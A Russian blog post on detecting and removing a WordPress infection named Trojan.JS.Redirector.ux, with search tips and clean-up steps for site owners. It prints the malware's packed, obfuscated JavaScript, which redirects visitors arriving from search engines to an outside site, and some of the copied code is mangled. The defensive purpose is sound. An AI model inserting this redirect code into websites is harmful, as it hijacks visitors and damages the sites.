Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого

Всем привет! Вот уж не думал, что снова встретимся! Да нет же, это я не вам, читатели «Первого блога альтруиста» — в нашей встрече я уверене, а новому вирусу, который называется Trojan.JS.Redirector.ux. Поражает он в основном сайты wordpress, а мне потом возись с ним. Но я-то думал, этот вирус новый, а он оказался тем же JS/RefC-Gen или Mal/Iframe-AD.

Как же я его узнал? Конечно же по вредоносному коду, который он в себе несет. Многие вирусы попадают к нам на сайт совершенно случайно, пробивают пороли FTP, а потом мануально (в ручную), но скорее всего автоматически, располагаются в удобном (вирусу) и неприметном (для нас) месте.

Обо всем по порядку, сначала пример кода, найдя который знайте — ваш сайт обязательно заражен Trojan.JS.Redirector.ux.

<script type="text/javascript" language="\&quot;JavaScript\&quot;">// <![CDATA[
eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&#038;&#038;((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&#038;\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&#038;t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&#038;\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locatio
n'.split('|'),0,{}))
// ]]></script>

eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query

||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locatio

n'.split('|'),0,{}))

// ]]></script>

или

echo "<script type="text/javascript">// <![CDATA[

1	echo "<script type="text/javascript">// <![CDATA[

или

add_sscounter()

1	add_sscounter()

Как найти код вируса на сайте быстро?

1. Начинайте проверку с functions.php. Если код вируса есть, то скорее всего в самом низу файла. Также просмотрите сразу файл index.php.

Насчет index.php. Как вы знаете, такой файлик почти в каждой папке темы. Зачастую в нем написано всего лишь закомментированное «Silence is golden.» Но вот если index.php темы заражается, то заражаются все файлы index.php. Также это касается файлов с расширением .js.

2. Скачайте файлы темы wordpress на компьютер. Найдите скачанную папку Total Commander’ом. Кликните по ней правой клавишей мыши, выберите «Найти», далее «С текстом» и введите часть одного из кодов, описанных выше, например:

p,a,c,k,e,r

1	p,a,c,k,e,r

Внимание! Код в файле jquery.min.js — не вредоносный! Антивирус ClamAV постоянно называет этот абсолютно нормальный файл, как зараженный вирусом PUA.Script.Packed-1 или PUA.Script.Packed-2.

3. Самый брутальный, но очень действенный метод удаления вируса. Удаляем с хостинга все папки и файлы кроме:
— картинок и медиафайлов, вроде wp-content/uploads и image;
— robots.txt, .htaccess, sitemap.xml.gz, sitemap.xml и wp-config (не забываем проверить их на код);
— header.php, single.php и другие файлы темы, содержащие коды Яндекса, Google, Vkontakte и так далее (аналогично, проверяем на код вируса).
Потом перезаливаем wordpress, папку темы и закачиваем плагины. На всякий случай скачивал базы данных, проверял их, но не разу не находил там вирус. Готово.

Как проверить сайт на вирус?

Существует ряд ресурсов для проверки сайта на вирус, посоветую три:

1. http://www.virustotal.com/
2. http://antivirus-alarm.ru/proverka/
3. http://xseo.in/viruscan/

А как было у меня на этот раз?

Начнем с того, что две недели назад появился новый вирус wordpress Trojan.JS.Redirector.ux. Этому событию я уделил мало внимания, так как все мои сайты живы-здоровы и тема «удаление вируса с сайта wordress» хорошо раскрыта на «Первом блоге альтруиста».

И вот захожу я на один свой старенький сайт, который тоже вроде как жив-здоров, но касперский замечает в файлах-расцветках темы вредоносный код. Спокойно удаляю старую тему, нахожу более новую тему wordpress, заливаю ее на хостинг и несколько дней оптимизирую под контент сайта, а контент сайта делаю под тему.

Но через несколько дней, жму на RDS-бар, желая узнать дату последней индексации сайта гуглом, вместо даты стоит слово «Нет», нажав на которое, впадаю в ступор:

Выполнил все три пункта проверки, ни один из ресурсов проверки сайта не видит вирус, все вроде как хорошо, но… Включаю RDS-бар (на других сайтах работает исправно), жму на «Нет» индескации гугла и вижу картинку выше.

Только спустя несколько дней, понимаю, что вирус не на сайте, а в кэше (памяти) Google. Т.е. при последнем заходе, еще при «вирусной» теме поисковик запомнил, что сайт плох. А сайт бодр и здоров!

Чего желаю и вашим сайтам!

Все вопросы пишите в комментарии — с радостью отвечу. Буду благодарен, как и многие владельцы зараженных сайтов, за +1 или ретвит. А чтобы быть в курсе всех новостей сайта — подписывайтесь!

Удачи, пока.

Поставьте оценку автору!

Для меня это невероятно важно, а у вас займёт всего лишь один клик.